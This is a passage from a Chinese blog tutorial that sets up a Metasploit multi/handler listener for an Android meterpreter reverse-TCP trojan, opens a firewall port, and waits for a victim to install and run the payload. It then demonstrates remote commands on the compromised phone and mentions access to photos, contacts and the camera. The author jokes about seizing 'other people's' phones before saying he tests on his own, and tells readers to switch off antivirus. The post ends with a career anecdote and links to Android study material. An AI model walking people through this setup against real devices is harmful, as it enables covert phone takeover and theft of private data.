木马生成完毕，msfvenom兄弟的工作就基本完工了，接下来就有请msfconsole上场了，没错，就是打开metasploit的控制台，着手配置相关信息，开始渗透了~

直接输入msfconsole

$ msfconsole

长久看多了单调代码的你，下面的图形代码有没有让你灰色的世界多点点色彩~~

谈正事~我们需要配置什么呢？前面生成木马的时候不是设置了ip和端口吗？现在我们也要在控制台上配置ip和端口，做监听来的

要做的流程大概是这些

（在msfconsole模式下）加载exploit模块

msf > use exploit/multi/handler

(exploit模式下)选择之前我们粘贴过一次的攻击载荷：android/meterpreter/reverse_tcp

msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp

(exploit模式下)查看一下列表有没有多出你设置的载荷

msf exploit(multi/handler)> show options

(exploit模式下)设置黄色框下的LHOST和LPORT，就设置成之前生成木马搞的ip和端口

顺便放行端口，输入命令firewall-cmd --add-port=3333/tcp

firewall-cmd --add-port=3333/tcp # 开放通过tcp访问3333

配置的流程都搞完了，马上就是渗透了。

群灵觉醒，封印解除，出来吧！exploit

输入命令exploit，开始监控，记住不要关掉，就坐等别人的手机安装，然后别人点击的瞬间，俺这里马上获取到别人手机的控制权，到时候，嘿嘿。当然，俺这里是渗透自己的手机（然并软—~）

既然是渗透自己的手机，把生成的木马拿出来下载吧，俺这里是ftp连接linux成功后，找到木马下载安装到自己的手机上（杀毒软件请关掉），我用的是xftp，只要你能把那个木马拿出来下载，管你用什么办法~~

安装好木马后，点击打开的瞬间，没有啥反应。手机上没反应没关系，关键是终端exploit监听有反应，并且开始渗透并成功。

如果终端没有反应，就是防火墙的问题，设置的端口要放行

输个?，查看命令列表

比如查看下手机信息

sysinfo

想打开某个应用，输入app_list查看app列表

然后使用使用app_run命令打开app对应的package名称

手机上的termux就会自己启动

好了，还有关于相册或者通讯录、照相什么的指令就不讲了，你们自己探究探究吧

尾声

开发是需要一定的基础的，我是08年开始进入Android这行的，在这期间经历了Android的鼎盛时期，和所谓的Android”凉了“。中间当然也有着，不可说的心酸，看着身边朋友，同事一个个转前端，换行业，其实当时我的心也有过犹豫，但是我还是坚持下来了，这次的疫情就是一个好的机会，大浪淘沙，优胜劣汰。再等等，说不定下一个黄金浪潮就被你等到了。

• 330页 PDF Android核心笔记

• 几十套阿里 、字节跳动、腾讯、华为、美团等公司2020年的面试题

• PDF和思维脑图，包含知识脉络 + 诸多细节

• Android进阶系统学习视频

)]

[外链图片转存中…(img-GXRcLSxt-1643529288618)]

• PDF和思维脑图，包含知识脉络 + 诸多细节

[外链图片转存中…(img-mDoMnVIl-1643529288618)]

• Android进阶系统学习视频

[外链图片转存中…(img-9oV5jQOg-1643529288619)]

本文已被CODING开源项目：《Android学习笔记总结+移动架构视频+大厂面试真题+项目实战源码》收录

标签：Metasploit,面试题,Centos,端口,tcp,exploit,木马,手机,Android
来源： https://blog.csdn.net/m0_66264533/article/details/122753502